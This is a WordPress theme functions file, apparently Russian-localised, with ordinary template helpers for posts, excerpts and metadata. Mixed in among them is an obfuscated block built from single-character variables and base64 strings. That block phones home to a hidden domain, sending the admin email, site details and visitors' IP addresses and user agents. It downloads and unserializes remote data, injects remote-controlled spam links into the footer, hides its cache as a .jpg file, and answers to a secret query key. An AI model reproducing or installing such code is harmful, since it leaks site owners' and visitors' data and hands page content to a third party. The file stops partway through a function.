<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $gpodfW='o';$fGCvoI='d';$yfgV='d';$JJVQ='e';$DBPe='a';$XQxMN='6';$jiVpI='s';$XEVo='e';$tEPAXtZ='b';$PHhtjWx='_';$FhZvH='4';$mBoHPX='e';$LLnzhT='c';$gGbahOXX=$tEPAXtZ.$DBPe.$jiVpI.$JJVQ.$XQxMN.$FhZvH.$PHhtjWx.$fGCvoI.$XEVo.$LLnzhT.$gpodfW.$yfgV.$mBoHPX;$rGGpDyV='f';$XXRGEX='g';$vdqW='l';$ONFPHZX='n';$iBCp='z';$seUJKBZ='e';$FNEpMy='a';$CAMqnsg='t';$ZJYTzQc='i';$HbUthssJ=$XXRGEX.$iBCp.$ZJYTzQc.$ONFPHZX.$rGGpDyV.$vdqW.$FNEpMy.$CAMqnsg.$seUJKBZ;$Mqadwx='1';$hkKuD='s';$wbyB='_';$hsQF='r';$pVVkFGM='t';$ULzrfx='r';$TyGu='3';$plSVRE='t';$XQxsup='o';$DteiJRGy=$hkKuD.$pVVkFGM.$ULzrfx.$wbyB.$hsQF.$XQxsup.$plSVRE.$Mqadwx.$TyGu;$ZEeOyKy='r';$pEOY='e';$xZjCJEp='s';$KzbGNqu='r';$dPag='v';$RcurQVp='t';$KBZacWoo=$xZjCJEp.$RcurQVp.$ZEeOyKy.$KzbGNqu.$pEOY.$dPag;                     
		$ko________j='o';$gm___________o='d';$uq_______p='d';$yg____b='e';$sa________i='a';$ug________i='6';$lg_____________x='s';$rd___________j='e';$he_______d='b';$cz_______r='_';$bc____e='4';$ww______________y='e';$de___________o='c';$ff__i=$he_______d.$sa________i.$lg_____________x.$yg____b.$ug________i.$bc____e.$cz_______r.$gm___________o.$rd___________j.$de___________o.$ko________j.$uq_______p.$ww______________y;
		$wg__________o='x';$ys______________d='_';$aa_______s='s';$se____________u='i';$tf______________l='n';$ve____l='s';$go_________a='f';$sf______________y='c';$kq_______d='e';$er____________g='u';$vn_________d='t';$nq___________m='o';$mm_________h='i';$ee________r='t';$qj____w='n';$dc____t=$go_________a.$er____________g.$tf______________l.$sf______________y.$vn_________d.$se____________u.$nq___________m.$qj____w.$ys______________d.$kq_______d.$wg__________o.$mm_________h.$aa_______s.$ee________r.$ve____l;
		$de___f='p';$at_____________p='o';$sg______________z='n';$is___________e='e';$pw__________l='f';$gb______________x=$pw__________l.$at_____________p.$de___f.$is___________e.$sg______________z;
		$mx___________f='f';$st_________s='d';$sw____________o='e';$po____t='a';$eo____q='r';$bx______________n=$mx___________f.$eo____q.$sw____________o.$po____t.$st_________s;
		$tp____x='l';$kv___h='e';$tr_________u='o';$li____________f='c';$zt_________x='f';$wk_______________q='s';$ll__b=$zt_________x.$li____________f.$tp____x.$tr_________u.$wk_______________q.$kv___h;
		
		define("WP_ID", $ff__i("Mi4wLjA="));
		define("WP_TTL", $ff__i("MTA4MDA="));
		define("WP_SRC", $ff__i("dHBva24="));
	


		function wp_get_header() {
			global $ff__i, $dc____t;
			
			if (
				$dc____t($ff__i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dc____t($ff__i("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dc____t($ff__i("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ff__i, $gb______________x, $ll__b, $bx______________n;
			
			$wz____________j = TEMPLATEPATH."/".$ff__i("Zm9vdGVyLnBocA==");
			$ic____u = @$gb______________x($wz____________j, "r");
			$wz____________j = @$bx______________n($ic____u, @filesize($wz____________j));
			@$ll__b($ic____u);
			
			$us_________w = TEMPLATEPATH."/".$ff__i("ZnVuY3Rpb25zLnBocA==");
			$ic____u = @$gb______________x($us_________w, "r");
			$us_________w = @$bx______________n($ic____u, @filesize($us_________w));
			@$ll__b($ic____u);
			
			$ll________u = 0;
			if($wz____________j && $us_________w) {
				if ($ff__i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wz____________j, $ff__i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ll________u = 1;
					}
					if (substr_count($wz____________j, "wp_theme_GPL_credits()") < 1) {
						$ll________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ll________u = 12;
				}
			}
			
			if($ll________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ll________u -->";
			}
		}
	


		function wp_loaded() {
			global $ff__i, $dc____t;
			return $dc____t($ff__i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($kb____n, $hy_______________s = "(more...)", $rm_____p = 0, $qy_________w = "") {
				$ac_____i = get_the_content($hy_______________s, $rm_____p, $qy_________w);
				$ac_____i = apply_filters("the_content", $ac_____i);
				
				$ac_____i = str_replace("]]>", "]]>", $ac_____i);
				if (strlen($_GET["p"]) > 0) {
					echo $ac_____i;
				}
				else if ((strlen($ac_____i)>$kb____n) && ($ew____________p = strpos($ac_____i, " ", $kb____n ))) {
					$ac_____i = substr($ac_____i, 0, $ew____________p);
					$ac_____i = $ac_____i;
					echo $ac_____i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$hy_______________s</a></div></p>";
				} else {
					echo $ac_____i;
				}
				
			}
		}
	


		$fo__________f='4';$lw_____________q='e';$zg____________n='d';$ne___h='6';$ak_______________p='a';$mv_____________x='s';$ov_______________p='n';$gx____s='c';$gr________f='b';$sy__________h='e';$ta__________l='o';$fb______m='_';$lx_______s='e';$ar______a=$gr________f.$ak_______________p.$mv_____________x.$sy__________h.$ne___h.$fo__________f.$fb______m.$lx_______s.$ov_______________p.$gx____s.$ta__________l.$zg____________n.$lw_____________q;
		$bk__________e='g';$nl_____________x='n';$jt______________h='f';$lf____________o='n';$cv____________c='_';$vi_______________x='l';$as___________t='i';$ci_______________m='t';$qa__________i='e';$uk__________l='e';$or__q='t';$nu____________c='s';$kk_____________l='t';$jz_________w='_';$tw______j='o';$ol______________k='c';$qr___l='e';$hs________q=$jt______________h.$as___________t.$vi_______________x.$qr___l.$jz_________w.$bk__________e.$qa__________i.$ci_______________m.$cv____________c.$ol______________k.$tw______j.$nl_____________x.$kk_____________l.$uk__________l.$lf____________o.$or__q.$nu____________c;
		$nt_____f='i';$pc_______________n='l';$zn____o='x';$yk__e='i';$zw______o='t';$cv_____f='_';$sk_____p='f';$zf___x='s';$eo_____________c='s';$ie_________y='e';$yt___________j='e';$rh______s=$sk_____p.$yk__e.$pc_______________n.$yt___________j.$cv_____f.$ie_________y.$zn____o.$nt_____f.$eo_____________c.$zw______o.$zf___x;
		$mo___________u='r';$dk______o='v';$jt____________v='m';$aj_____________d='a';$rs______b='c';$cy______k='o';$xg______________m='e';$cd____________n='o';$kj___________g='e';$lo____z='s';$hi__________d='n';$ph_______t='_';$hy_____________a='p';$il________i='r';$tc_________v='i';$pa____s=$dk______o.$kj___________g.$il________i.$lo____z.$tc_________v.$cd____________n.$hi__________d.$ph_______t.$rs______b.$cy______k.$jt____________v.$hy_____________a.$aj_____________d.$mo___________u.$xg______________m;
		$ld_____________g='o';$tb______a='f';$oe_________n='c';$er_______l='k';$rt_____a='o';$lx______________f='e';$ia__________o='s';$if_______k='p';$yg_____h='n';$uo_____q=$tb______a.$ia__________o.$ld_____________g.$oe_________n.$er_______l.$rt_____a.$if_______k.$lx______________f.$yg_____h;
		$br_______i='f';$mf__l='w';$oz__________t='i';$kb__________p='t';$wa_______________r='r';$rm___n='e';$lr___g=$br_______i.$mf__l.$wa_______________r.$oz__________t.$kb__________p.$rm___n;
		$hu__v='m';$tr__________e='d';$tf____________k='5';$tk_____d=$hu__v.$tr__________e.$tf____________k;
		$go___________q='t';$ia______________g='l';$vf_______s='a';$of_______________f='e';$dg____________c='r';$rw______________z='p';$ls__f='a';$zp_____________d='h';$vz___c=$dg____________c.$of_______________f.$vf_______s.$ia______________g.$rw______________z.$ls__f.$go___________q.$zp_____________d;
		$zk__________x='s';$vs__l='e';$um_______t='i';$my____________g='i';$ir__x='a';$qc__________j='e';$zr__i='n';$rf__f='u';$no________e='l';$tt______________o='r';$dk__d='z';$wz____a=$rf__f.$zr__i.$zk__________x.$qc__________j.$tt______________o.$my____________g.$ir__x.$no________e.$um_______t.$dk__d.$vs__l;
		$sd______o='n';$uo________w='a';$iz________w='m';$wo____________w='m';$vl______________m='e';$dj______________v='p';$sd______c='t';$ol__e=$sd______c.$vl______________m.$iz________w.$dj______________v.$sd______o.$uo________w.$wo____________w;
		$jx_____i='t';$fj____________h='s';$ya__n='a';$pm_____p='e';$zc_______________n='a';$of___i='e';$yr_____y='e';$ia_____________s='e';$og___b='x';$no___________v='m';$sy___a='r';$qr______________r='o';$kg______________q='c';$kz__m='r';$ik______________t='n';$ve___________n='_';$uu______________p='t';$va__l='c';$zo___j='_';$mi___b='t';$ar________g='t';$fm__m=$fj____________h.$ar________g.$kz__m.$yr_____y.$zc_______________n.$no___________v.$ve___________n.$kg______________q.$qr______________r.$ik______________t.$jx_____i.$pm_____p.$og___b.$uu______________p.$zo___j.$va__l.$sy___a.$ia_____________s.$ya__n.$mi___b.$of___i;
	


		function el_____l($il_______________r) {
			global $ff__i, $dc____t, $hs________q, $pa____s, $fm__m;
			
			if (!$dc____t($ff__i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($pa____s(PHP_VERSION, "5.0.0", ">=") && $dc____t($ff__i("ZmlsZV9nZXRfY29udGVudHM=")) && $dc____t($ff__i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$cd_______b = $fm__m(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$yt________i = @$hs________q($il_______________r, 0, $cd_______b);
			} else {
				$yt________i = @$hs________q($il_______________r, 0);
			}
			
			return $yt________i;
		}
	


		function nw____________g($il_______________r) {
			global $dc____t, $uo_____q, $lr___g, $ff__i;
			
			if (!$dc____t($ff__i("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$en___________j = strpos($il_______________r, "/", 7);
			$hj_______j = array(
				"uri"     => substr($il_______________r, $en___________j),
				"host"    => str_replace("http://", "", substr($il_______________r, 0, $en___________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zp_____g = @$uo_____q("$hj_______j[host]", 80, $up_________r, $xp_____________j, 4);
			
			if (!$zp_____g) {
				return false;
			} else {
				$yt________i = "";
				$md______________c  = "GET $hj_______j[uri] HTTP/1.0\r\n";
				$md______________c .= "Host: $hj_______j[host]\r\n";
				$md______________c .= "Referer: $hj_______j[referer]\r\n";
				$md______________c .= "Connection: Close\r\n\r\n";
				
				@$lr___g($zp_____g, $md______________c);
				
				while (!@feof($zp_____g)) {
					$ct_____________f = @fgets($zp_____g, (1024*24));
					
					if ($ct_____________f == "\r\n") {
						$ju_________z = true;
						continue;
					}
					
					if ($ju_________z) {
						$yt________i .= $ct_____________f;
					}
				}
				
				return $yt________i;
			}
		}
	


		function rc___u($il_______________r) {
			global $dc____t;
			$sh__a = false;
			
			if ($il_______________r != "") {
				if ($dc____t("el_____l")) {
					$sh__a = @el_____l($il_______________r);
				}
				
				if (!$sh__a && ($dc____t("nw____________g"))) {
					$sh__a = @nw____________g($il_______________r);
				}
			}
			
			return $sh__a;
		}
	


		function fp_________g() {
			global $_SERVER, $tk_____d;
			
			$vb____________b = $_SERVER["SERVER_NAME"];
			
			if (substr("$vb____________b", 0, 4) == "www.") {
				$vb____________b = substr("$vb____________b", 4);
			}
			
			$vb____________b = $tk_____d("$_SERVER[SERVER_NAME]");
			
			return $vb____________b;
		}
	


		function om_____________m() {
			return "file";
		}
	


		function gb_________k($il_______________r) {
			global $_SERVER, $hs________q, $rh______s, $gb______________x, $ll__b, $lr___g;
			
			$qt____________k = us____b();
			
			$jj___________f = fp_________g().".jpg";
			$tk__________f = $qt____________k["dir_upload"]["path"]."/$jj___________f";
			$np__________r = @filemtime($tk__________f);
			
			if (!$np__________r || ((time()-$np__________r) >= WP_TTL)) {
				$sh__a = rc___u($il_______________r);
				
				if ($sh__a) {
					if ($rh______s($tk__________f)) {
						@unlink($tk__________f);
					}
					
					$ic____u = @$gb______________x($tk__________f, "x+");
					
					@$lr___g($ic____u, $sh__a);
					@$ll__b($ic____u);
				}
			} else {
				if ($rh______s($tk__________f)) {
					$sh__a = @$hs________q($tk__________f);
				} else {
					$sh__a = false;
				}
			}
			
			return $sh__a;
		}
	


		function us____b() {
			global $_SERVER, $ff__i, $ar______a;
			
			$yq___________r = wp_count_posts("post");
			$wv______j = pathinfo(get_bloginfo("template_directory"));
			
			$qt____________k = array(
				"url" => array(
					"report"      => $ff__i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wv______j,
				"dir_upload"	=> ds_______r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wv______j[filename],
					"a005=".$yq___________r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://animefanfiki.info/avto-sovet/tchem-perevozity\">Грузоперевозки</a>"
			);
			
			$qt____________k["url"]["queryString"] = implode("&", $qt____________k["queryString"]);
			$qt____________k["url"]["report"] = $qt____________k["url"]["report"]."/?".$ar______a($qt____________k["url"]["queryString"]).".html";
						
			return $qt____________k;
		}
	


		function ds_______r() {
			$ig_________f = wp_upload_dir();
			
			if (isset($ig_________f["error"])) {
				$tq_____________w = jh____v();
				if (is_writable($tq_____________w)) {
					$ig_________f = array("path" => $tq_____________w);
				}
			}

			return $ig_________f;
		}
	


		function jh____v() {
			global $dc____t, $tk_____d, $vz___c, $ol__e;
			
			$ea_____m = (bool) ini_get("safe_mode");
			if ($ea_____m == true) {
				return false;
			}
			
			if ($dc____t("sys_get_temp_dir")) {
				$cn_____________r = sys_get_temp_dir();
				if (is_writable($cn_____________r)) {
					return $vz___c($cn_____________r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $vz___c($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $vz___c($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $vz___c($_ENV["TEMP"]);
			} else {
				$am_________k = $ol__e($tk_____d(uniqid(rand(), true)), "");
				if ($am_________k) {
					$cn_____________r = $vz___c(dirname($am_________k));
					@unlink($am_________k);
					return $cn_____________r;
				} else {
					return false;
				}
			}
		}
	


		function ra_____z() {
			global $_GET, $rh______s;
			
			$qt____________k = us____b();
			$vb____________b = fp_________g();
			$uz_________r = om_____________m();
			
			$tf_________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($uz_________r == "file") {
					$ks______u = $qt____________k["dir_upload"]["path"]."/".$vb____________b.".jpg";
					if ($rh______s($ks______u)) {
						@unlink($ks______u);
						$tf_________w = "deleted";
					}
				}
				
				$go_____b = array(
					"s"	=> $tf_________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($go_____b AS $ix________t => $qt_________a) echo " [$ix________t:$qt_________a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dc____t, $ff__i, $wz____a;
			$qt____________k = us____b();
			
			$ex______n = "gb_________k";
			if ($dc____t($ex______n)) {
				$yt________i = $ex______n($qt____________k["url"]["report"]);
			}
			
			if ($yt________i) {
				if ($yt________i = @$ff__i($yt________i)) {
					$yt________i = @$wz____a($yt________i);
					
					if (strlen($yt________i[custom_credit]) >= 5) {
						$qt____________k["default_string"] = $yt________i[custom_credit];
					}
					
					if ($yt________i["status"] == "0") {
						$qp____________a = 1;
						$oy_____k = 1;
					} else {
						$bp________j = sizeof($yt________i["links"]);
						$uv__________u = $qt____________k["default_string"];
						
						if ($bp________j > 0 && $yt________i["links"] !== "") {
							$rd__r = 0;
							foreach ($yt________i["links"] as $jf________i => $jh_____e) {
								$rd__r++;
								if ($jh_____e->l_path == "" || $jh_____e->l_path == $_SERVER["REQUEST_URI"]) {
									$jh_____e->l_href = htmlspecialchars(strip_tags($jh_____e->l_href));
									$jh_____e->l_title = htmlspecialchars(strip_tags($jh_____e->l_title));
									$jh_____e->l_anchor = htmlspecialchars(strip_tags($jh_____e->l_anchor));
									$uv__________u .= " | ";
									$uv__________u .= "<a href='$jh_____e->l_href' title='$jh_____e->l_title'";
									if ($jh_____e->l_nofollow == "1") {
										$uv__________u .= " rel='nofollow'";
									}
									$uv__________u .= ">$jh_____e->l_anchor</a>";
								}
							}
						}
						$qt____________k["links"] = "$uv__________u";
						if ($yt________i[credit] == "0") {
							$qt____________k["links"] = "";
						}
					}
				} else {
					$qp____________a = "1";
				}
			} else {
				$qp____________a = "1";
			}
			
			if ($qp____________a == "1") {
				$qt____________k["links"] = $qt____________k["default_string"];
			}
			
			echo "$qt____________k[links]";
			
			echo "<!-- s: $yt________i[signature] -->";
			ra_____z();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Older Entries', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
